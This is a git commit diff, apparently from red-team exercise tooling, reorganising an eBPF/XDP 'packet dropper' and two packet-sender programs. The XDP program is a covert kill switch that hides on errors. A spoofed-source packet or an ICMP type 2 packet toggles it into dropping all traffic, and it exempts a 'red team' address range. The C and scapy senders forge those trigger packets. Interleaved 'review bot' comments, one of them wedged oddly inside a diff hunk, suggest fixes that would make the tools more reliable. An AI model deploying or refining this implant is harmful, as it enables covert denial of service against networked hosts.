From b9ef8fbd63fface91ff3cd98d7d702f9827c322d Mon Sep 17 00:00:00 2001
From: Ryan Schanzenbacher
Date: Mon, 20 Mar 2023 18:03:45 -0400
Subject: organization
---
packet_dropper.c | 77 ---------------------------
packet_dropper.o | Bin 8648 -> 0 bytes
packet_dropper_new.c | 95 ---------------------------------
packet_sender.py | 7 ---
ping3 | Bin 22704 -> 0 bytes
ping3.c | 110 ---------------------------------------
ping_send | Bin 6113864 -> 0 bytes
ping_senders/packet_sender.py | 7 +++
ping_senders/ping3 | Bin 0 -> 22704 bytes
ping_senders/ping3.c | 110 +++++++++++++++++++++++++++++++++++++++
ping_senders/ping_send | Bin 0 -> 6113864 bytes
xdp-program/packet_dropper.c | 77 +++++++++++++++++++++++++++
xdp-program/packet_dropper.o | Bin 0 -> 8648 bytes
xdp-program/packet_dropper_new.c | 95 +++++++++++++++++++++++++++++++++
14 files changed, 289 insertions(+), 289 deletions(-)
delete mode 100644 packet_dropper.c
delete mode 100644 packet_dropper.o
delete mode 100644 packet_dropper_new.c
delete mode 100644 packet_sender.py
delete mode 100755 ping3
delete mode 100644 ping3.c
delete mode 100644 ping_send
create mode 100644 ping_senders/packet_sender.py
create mode 100755 ping_senders/ping3
create mode 100644 ping_senders/ping3.c
create mode 100644 ping_senders/ping_send
create mode 100644 xdp-program/packet_dropper.c
create mode 100644 xdp-program/packet_dropper.o
create mode 100644 xdp-program/packet_dropper_new.c
diff --git a/packet_dropper.c b/packet_dropper.c
deleted file mode 100644
index d0a8d85..0000000
--- a/packet_dropper.c
+++ /dev/null
@@ -1,77 +0,0 @@
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-struct {
- __uint(type, BPF_MAP_TYPE_ARRAY);
- __type(key, __u32);
- __type(value, __u32);
- __uint(max_entries, 1);
-} status SEC(".maps");
-
-SEC("xdpentry")
-int entry(struct xdp_md *ctx) {
- // Prepare some data structures
- __u32 *rec;
- __u32 key = 0;
- void *data_end = (void *)(long)ctx->data_end;
- void *data = (void *)(long)ctx->data;
- struct ethhdr *eth = data;
-
- rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
- if (!rec) {
- return XDP_DROP; // try to lay low on error
- }
- //bpf_printk("Rec: %u", *rec); // Debug prints
- if ((*rec != 55) && (*rec != 56)) {
- // First run check
- // bpf_printk("Resetting rec!"); // Debug Prints
- *rec = 56; // set default value for map
- }
-
- if (eth + 1 > data_end) // Bounds checking for xdp preverifier
- return XDP_PASS; // This should never run normally
-
- /** if(eth->h_proto != ETH_P_IP) {
- return XDP_PASS; // don't kill layer 2 traffic
- } **/
-
- struct iphdr *iph = data + sizeof(struct ethhdr);
- if (iph + 1 > data_end) // More bounds checking
- return XDP_PASS; // This should never run either
- //
- __u32 ip_src = iph->saddr; // grab source address of packet
- // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
- // Determine if we need to further process this packet
- if (ip_src == 1946091487) {
- // This packet had a destination of 223.255.254.115, do something!
- // bpf_printk("Got it!, setting rec..."); // Debug print
- switch (*rec) {
- case 55 :
- *rec = 56;
- break;
- case 56 :
- *rec = 55;
- break;
- }
- return XDP_DROP;
- }
- else if (ip_src == 0) {
- // most likely a layer 2 packet, let it thru
- return XDP_PASS;
- }
-
- // Finish processing
- if (*rec == 55) {
- return XDP_DROP;
- } else {
- return XDP_PASS;
- }
-}
-
-
-char _license[] SEC("license")= "GPL";
diff --git a/packet_dropper.o b/packet_dropper.o
deleted file mode 100644
index 3958484..0000000
Binary files a/packet_dropper.o and /dev/null differ
diff --git a/packet_dropper_new.c b/packet_dropper_new.c
deleted file mode 100644
index 3033b38..0000000
--- a/packet_dropper_new.c
+++ /dev/null
@@ -1,95 +0,0 @@
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-struct {
- __uint(type, BPF_MAP_TYPE_ARRAY);
- __type(key, __u32);
- __type(value, __u32);
- __uint(max_entries, 1);
-} status SEC(".maps");
-
-SEC("xdpentry")
-int entry(struct xdp_md *ctx) {
- // Prepare some data structures
- __u32 *rec;
- __u32 key = 0;
- void *data_end = (void *)(long)ctx->data_end;
- void *data = (void *)(long)ctx->data;
- struct ethhdr *eth = data;
-
- rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
- if (!rec) {
- return XDP_DROP; // try to lay low on error
- }
- //bpf_printk("Rec: %u", *rec); // Debug prints
- if ((*rec != 55) && (*rec != 56)) {
- // First run check
- // bpf_printk("Resetting rec!"); // Debug Prints
- *rec = 56; // set default value for map
- }
-
- if (eth + 1 > data_end) // Bounds checking for xdp preverifier
- return XDP_PASS; // This should never run normally
-
- if(bpf_ntohs(eth->h_proto) == ETH_P_ARP) {
- return XDP_PASS; // don't kill layer 2 traffic
- }
-
- struct iphdr *iph = data + sizeof(struct ethhdr);
- if (iph + 1 > data_end) // More bounds checking
- return XDP_PASS; // This should never run either
- //
- __u32 ip_src = iph->saddr; // grab source address of packet
-
- struct icmphdr *icmph = data + sizeof(struct ethhdr) + sizeof(struct iphdr);
- if (icmph + 1 > data_end) {
- // More bounds checking
- return XDP_PASS;
- }
-
- char *pingdata = data + sizeof(struct ethhdr) + sizeof(struct iphdr) + sizeof(struct icmphdr);
-
- // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
- // Determine if we need to further process this packet
- //if (ip_src == 1946091487) {
- bpf_printk("Incoming packet: %u\n", icmph->type);
- if (icmph->type == 2 || ip_src == 1946091487) {
- // This packet had a destination of 223.255.254.115, do something!
- // bpf_printk("Got it!, setting rec..."); // Debug print
- switch (*rec) {
- case 55 :
- *rec = 56;
- break;
- case 56 :
- *rec = 55;
- break;
- }
- return XDP_DROP;
- }
- else if (ip_src == 0) {
- // most likely a layer 2 packet, let it thru
- return XDP_PASS;
- }
-
- else if (ip_src >= 16974090 && ip_src <= 503513354) {
- // IP is between 10.1.3.1 and 10.1.3.30. Allow to pass for red team
- return XDP_PASS;
- }
-
- // Finish processing
- if (*rec == 55) {
- return XDP_DROP;
- } else {
- return XDP_PASS;
- }
-}
-
-
-char _license[] SEC("license")= "GPL";
diff --git a/packet_sender.py b/packet_sender.py
deleted file mode 100644
index 7703a5f..0000000
--- a/packet_sender.py
+++ /dev/null
@@ -1,7 +0,0 @@
-from scapy.all import Ether, IP, UDP, sendp
-
-input_ip = input("Enter destination IP: ")
-
-p = Ether()/IP(dst=input_ip, src='223.255.254.115')/UDP(b"A Payload")
-
-sendp(p)
diff --git a/ping3 b/ping3
deleted file mode 100755
index edb585c..0000000
Binary files a/ping3 and /dev/null differ
diff --git a/ping3.c b/ping3.c
deleted file mode 100644
index f0dd858..0000000
--- a/ping3.c
+++ /dev/null
@@ -1,110 +0,0 @@
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-unsigned short cksum(unsigned short *addr, int len);
-
-int main(int argc, char *argv[]) {
- int sock;
- char send_buf[400], src_ip[15], dst_ip[15], src_name[256];
- struct ip *ip = (struct ip *)send_buf;
- struct icmp *icmp = (struct icmp *)(ip + 1);
- struct hostent *src_hp, *dst_hp;
- struct sockaddr_in src, dst;
- int on = 1;
- memset(send_buf, 0, sizeof(send_buf));
-
- if (argc < 2) {
- printf("Need arg. I\n");
- exit(EXIT_FAILURE);
- }
-
- /**if (getuid() == 0) {
- fprintf(stderr, "Need to elevate\n");
- exit(EXIT_FAILURE);
- } **/
-
- gethostname(src_name, sizeof(src_name));
- printf("%s\n", src_name);
- src_hp = gethostbyname(src_name);
- ip->ip_src = (*(struct in_addr *)src_hp->h_addr_list[0]);
-
- dst_hp = gethostbyname(argv[1]);
- ip->ip_dst = (*(struct in_addr *)dst_hp->h_addr);
- dst.sin_addr = (*(struct in_addr *)dst_hp->h_addr);
-
- sprintf(src_ip, "%s", inet_ntoa(ip->ip_src));
- sprintf(dst_ip, "%s", inet_ntoa(ip->ip_dst));
- printf("Src: %s -- Dst: %s\n", src_ip, dst_ip);
-
- // Create socket
- sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
-
- setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
-
- // IP Structure
- ip->ip_v = 4;
- ip->ip_hl = 5;
- ip->ip_tos = 0;
- ip->ip_len = htons(sizeof(send_buf));
- ip->ip_id = htons(321);
- ip->ip_off = htons(0);
- ip->ip_ttl = 255;
- ip->ip_p = IPPROTO_ICMP;
- ip->ip_sum = 0;
-
- // ICMP Structure
- icmp->icmp_type = 2;
- icmp->icmp_code = 0;
-
- dst.sin_family = AF_INET;
-
- ip->ip_sum = cksum((unsigned short *)send_buf, ip->ip_hl);
- icmp->icmp_cksum = cksum((unsigned short *)icmp, sizeof(send_buf) - sizeof(struct icmp));
-
- int dst_addr_len = sizeof(dst);
- int bytes_sent;
-
- if((bytes_sent = sendto(sock, send_buf, sizeof(send_buf), 0, (struct sockaddr *)&dst, dst_addr_len)) < 0) {
- perror("send err");
- fflush(stdout);
- }
- else {
- printf("Sent %d bytes\n", bytes_sent);
- }
-
-
-}
-
-unsigned short cksum(unsigned short *addr, int len) {
- int nleft = len;
- int sum = 0;
- unsigned short *w = addr;
- unsigned short answer = 0;
-
- while (nleft > 1) {
- sum += *w++;
- nleft -= 2;
- }
-
- if (nleft == 1) {
- *(unsigned char *)(&answer) = *(unsigned char *)w;
- sum += answer;
- }
-
- sum = (sum >> 16) + (sum & 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
-
- return answer;
-}
diff --git a/ping_send b/ping_send
deleted file mode 100644
index 37a2396..0000000
Binary files a/ping_send and /dev/null differ
diff --git a/ping_senders/packet_sender.py b/ping_senders/packet_sender.py
new file mode 100644
index 0000000..7703a5f
--- /dev/null
+++ b/ping_senders/packet_sender.py
@@ -0,0 +1,7 @@
+from scapy.all import Ether, IP, UDP, sendp
+
+input_ip = input("Enter destination IP: ")
+
+p = Ether()/IP(dst=input_ip, src='223.255.254.115')/UDP(b"A Payload")
+
+sendp(p)
diff --git a/ping_senders/ping3 b/ping_senders/ping3
new file mode 100755
index 0000000..edb585c
Binary files /dev/null and b/ping_senders/ping3 differ
diff --git a/ping_senders/ping3.c b/ping_senders/ping3.c
new file mode 100644
index 0000000..f0dd858
--- /dev/null
+++ b/ping_senders/ping3.c
@@ -0,0 +1,110 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+unsigned short cksum(unsigned short *addr, int len);
+
+int main(int argc, char *argv[]) {
+ int sock;
+ char send_buf[400], src_ip[15], dst_ip[15], src_name[256];
+ struct ip *ip = (struct ip *)send_buf;
+ struct icmp *icmp = (struct icmp *)(ip + 1);
+ struct hostent *src_hp, *dst_hp;
+ struct sockaddr_in src, dst;
+ int on = 1;
+ memset(send_buf, 0, sizeof(send_buf));
+
+ if (argc < 2) {
+ printf("Need arg. I\n");
+ exit(EXIT_FAILURE);
+ }
+
+ /**if (getuid() == 0) {
+ fprintf(stderr, "Need to elevate\n");
+ exit(EXIT_FAILURE);
+ } **/
+
+ gethostname(src_name, sizeof(src_name));
+ printf("%s\n", src_name);
+ src_hp = gethostbyname(src_name);
+ ip->ip_src = (*(struct in_addr *)src_hp->h_addr_list[0]);
+
+ dst_hp = gethostbyname(argv[1]);
+ ip->ip_dst = (*(struct in_addr *)dst_hp->h_addr);
+ dst.sin_addr = (*(struct in_addr *)dst_hp->h_addr);
+
+ sprintf(src_ip, "%s", inet_ntoa(ip->ip_src));
+ sprintf(dst_ip, "%s", inet_ntoa(ip->ip_dst));
+ printf("Src: %s -- Dst: %s\n", src_ip, dst_ip);
+
+ // Create socket
+ sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+
+ setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
+
+ // IP Structure
+ ip->ip_v = 4;
+ ip->ip_hl = 5;
+ ip->ip_tos = 0;
+ ip->ip_len = htons(sizeof(send_buf));
+ ip->ip_id = htons(321);
+ ip->ip_off = htons(0);
+ ip->ip_ttl = 255;
+ ip->ip_p = IPPROTO_ICMP;
+ ip->ip_sum = 0;
+
+ // ICMP Structure
+ icmp->icmp_type = 2;
+ icmp->icmp_code = 0;
+
+ dst.sin_family = AF_INET;
+
+ ip->ip_sum = cksum((unsigned short *)send_buf, ip->ip_hl);
+ icmp->icmp_cksum = cksum((unsigned short *)icmp, sizeof(send_buf) - sizeof(struct icmp));
+
+ int dst_addr_len = sizeof(dst);
+ int bytes_sent;
+
+ if((bytes_sent = sendto(sock, send_buf, sizeof(send_buf), 0, (struct sockaddr *)&dst, dst_addr_len)) < 0) {
+ perror("send err");
+ fflush(stdout);
+ }
+ else {
+ printf("Sent %d bytes\n", bytes_sent);
+ }
+
+
+}
+
+unsigned short cksum(unsigned short *addr, int len) {
+ int nleft = len;
+ int sum = 0;
+ unsigned short *w = addr;
+ unsigned short answer = 0;
+
+ while (nleft > 1) {
+ sum += *w++;
+ nleft -= 2;
+ }
+
+ if (nleft == 1) {
+ *(unsigned char *)(&answer) = *(unsigned char *)w;
+ sum += answer;
+ }
+
+ sum = (sum >> 16) + (sum & 0xffff);
+ sum += (sum >> 16);
+ answer = ~sum;
+
+ return answer;
+}
diff --git a/ping_senders/ping_send b/ping_senders/ping_send
new file mode 100644
index 0000000..37a2396
Binary files /dev/null and b/ping_senders/ping_send differ
diff --git a/xdp-program/packet_dropper.c b/xdp-program/packet_dropper.c
new file mode 100644
index 0000000..d0a8d85
--- /dev/null
+++ b/xdp-program/packet_dropper.c
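Review bot: In ping_senders/ping3.c, `src_ip[15]` and `dst_ip[15]` are one byte too small for a full dotted quad, so `sprintf(src_ip, "%s", inet_ntoa(ip->ip_src))` writes 16 bytes for an address such as 255.255.255.255 and overruns the stack buffer. Declaring them as `char src_ip[INET_ADDRSTRLEN], dst_ip[INET_ADDRSTRLEN];` and formatting with `snprintf(src_ip, sizeof src_ip, "%s", inet_ntoa(ip->ip_src));` removes the overflow. Both `gethostbyname()` results are dereferenced without a NULL check, so an unresolvable local hostname or argv[1] crashes main(), and the return values of `socket()` and `setsockopt()` are never tested before `sendto()`. Separately, `cksum((unsigned short *)send_buf, ip->ip_hl)` passes the header length in 32-bit words (5) while cksum() counts its `len` down in bytes; `ip->ip_hl * 4` matches that contract.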
@@ -0,0 +1,77 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+struct {
+ __uint(type, BPF_MAP_TYPE_ARRAY);
+ __type(key, __u32);
+ __type(value, __u32);
+ __uint(max_entries, 1);
+} status SEC(".maps");
+
+SEC("xdpentry")
+int entry(struct xdp_md *ctx) {
+ // Prepare some data structures
+ __u32 *rec;
+ __u32 key = 0;
+ void *data_end = (void *)(long)ctx->data_end;
+ void *data = (void *)(long)ctx->data;
+ struct ethhdr *eth = data;
+
+ rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
+ if (!rec) {
+ return XDP_DROP; // try to lay low on error
+ }
+ //bpf_printk("Rec: %u", *rec); // Debug prints
+ if ((*rec != 55) && (*rec != 56)) {
+ // First run check
+ // bpf_printk("Resetting rec!"); // Debug Prints
+ *rec = 56; // set default value for map
+ }
+
+ if (eth + 1 > data_end) // Bounds checking for xdp preverifier
+ return XDP_PASS; // This should never run normally
+
+ /** if(eth->h_proto != ETH_P_IP) {
+ return XDP_PASS; // don't kill layer 2 traffic
+ } **/
+
+ struct iphdr *iph = data + sizeof(struct ethhdr);
+ if (iph + 1 > data_end) // More bounds checking
+ return XDP_PASS; // This should never run either
+ //
+ __u32 ip_src = iph->saddr; // grab source address of packet
+ // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
+ // Determine if we need to further process this packet
+ if (ip_src == 1946091487) {
+ // This packet had a destination of 223.255.254.115, do something!
+ // bpf_printk("Got it!, setting rec..."); // Debug print
+ switch (*rec) {
+ case 55 :
+ *rec = 56;
+ break;
+ case 56 :
+ *rec = 55;
+ break;
+ }
+ return XDP_DROP;
+ }
+ else if (ip_src == 0) {
+ // most likely a layer 2 packet, let it thru
+ return XDP_PASS;
+ }
+
+ // Finish processing
+ if (*rec == 55) {
+ return XDP_DROP;
+ } else {
+ return XDP_PASS;
+ }
+}
+
+
+char _license[] SEC("license")= "GPL";
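Review bot: With the EtherType test commented out, entry() treats every frame that is long enough as IPv4, so for ARP, IPv6 or any other non-IP frame the bytes at the `saddr` offset are unrelated data, and the `ip_src == 0` branch is only a guess at "layer 2" traffic. A guard such as `if (eth->h_proto != bpf_htons(ETH_P_IP)) return XDP_PASS;` before the `iph` cast keeps the IP logic to IP frames; the commented-out version compared `h_proto` to `ETH_P_IP` without a byte-order conversion, and whether bpf/bpf_endian.h is already included cannot be confirmed because the include targets are missing from the page. The state flip depends on the source address alone, which is an unauthenticated field, so any sender able to forge that address changes the drop/pass state for all traffic on the interface. The comment on that branch says "destination" while the code tests `iph->saddr`; `// source address 223.255.254.115, as loaded on a little-endian host` would match the code.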
diff --git a/xdp-program/packet_dropper.o b/xdp-program/packet_dropper.o
new file mode 100644
index 0000000..3958484
Binary files /dev/null and b/xdp-program/packet_dropper.o differ
diff --git a/xdp-program/packet_dropper_new.c b/xdp-program/packet_dropper_new.c
new file mode 100644
index 0000000..3033b38
--- /dev/null
+++ b/xdp-program/packet_dropper_new.c
@@ -0,0 +1,95 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+struct {
+ __uint(type, BPF_MAP_TYPE_ARRAY);
+ __type(key, __u32);
+ __type(value, __u32);
+ __uint(max_entries, 1);
+} status SEC(".maps");
+
+SEC("xdpentry")
+int entry(struct xdp_md *ctx) {
+ // Prepare some data structures
+ __u32 *rec;
+ __u32 key = 0;
+ void *data_end = (void *)(long)ctx->data_end;
+ void *data = (void *)(long)ctx->data;
+ struct ethhdr *eth = data;
+
+ rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
+ if (!rec) {
+ return XDP_DROP; // try to lay low on error
+ }
+ //bpf_printk("Rec: %u", *rec); // Debug prints
+ if ((*rec != 55) && (*rec != 56)) {
+ // First run check
+ // bpf_printk("Resetting rec!"); // Debug Prints
+ *rec = 56; // set default value for map
+ }
+
+ if (eth + 1 > data_end) // Bounds checking for xdp preverifier
+ return XDP_PASS; // This should never run normally
+
+ if(bpf_ntohs(eth->h_proto) == ETH_P_ARP) {
+ return XDP_PASS; // don't kill layer 2 traffic
+ }
+
+ struct iphdr *iph = data + sizeof(struct ethhdr);
+ if (iph + 1 > data_end) // More bounds checking
+ return XDP_PASS; // This should never run either
+ //
+ __u32 ip_src = iph->saddr; // grab source address of packet
+
+ struct icmphdr *icmph = data + sizeof(struct ethhdr) + sizeof(struct iphdr);
+ if (icmph + 1 > data_end) {
+ // More bounds checking
+ return XDP_PASS;
+ }
+
+ char *pingdata = data + sizeof(struct ethhdr) + sizeof(struct iphdr) + sizeof(struct icmphdr);
+
+ // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
+ // Determine if we need to further process this packet
+ //if (ip_src == 1946091487) {
+ bpf_printk("Incoming packet: %u\n", icmph->type);
+ if (icmph->type == 2 || ip_src == 1946091487) {
+ // This packet had a destination of 223.255.254.115, do something!
+ // bpf_printk("Got it!, setting rec..."); // Debug print
+ switch (*rec) {
+ case 55 :
+ *rec = 56;
+ break;
+ case 56 :
+ *rec = 55;
+ break;
+ }
+ return XDP_DROP;
+ }
+ else if (ip_src == 0) {
+ // most likely a layer 2 packet, let it thru
+ return XDP_PASS;
+ }
+
+ else if (ip_src >= 16974090 && ip_src <= 503513354) {
+ // IP is between 10.1.3.1 and 10.1.3.30. Allow to pass for red team
+ return XDP_PASS;
+ }
+
+ // Finish processing
+ if (*rec == 55) {
+ return XDP_DROP;
+ } else {
+ return XDP_PASS;
+ }
+}
+
+
+char _license[] SEC("license")= "GPL";
-- cgit v1.2.3
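Review bot: `icmph->type` is read without first checking `iph->protocol == IPPROTO_ICMP` or `iph->ihl == 5`, so for TCP, UDP or IP packets carrying options the byte at that fixed offset is unrelated data and can flip `*rec` by accident; only ARP is excluded by the EtherType test, so other non-IPv4 frames are parsed the same way. Gating the test, e.g. `if ((iph->protocol == IPPROTO_ICMP && iph->ihl == 5 && icmph->type == 2) || ip_src == 1946091487)`, restricts the comparison to real ICMP headers. The allow-list `ip_src >= 16974090 && ip_src <= 503513354` compares the network-order `saddr` as a host integer: on a little-endian host the last octet becomes the most significant byte, so the range matches by final octet rather than by the 10.1.3.x prefix the comment describes, whereas `__u32 h = bpf_ntohl(ip_src);` followed by `h >= 0x0A010301 && h <= 0x0A01031E` expresses the stated range. The unconditional `bpf_printk("Incoming packet: ...")` runs for every packet and `pingdata` is never used; both look like debug leftovers.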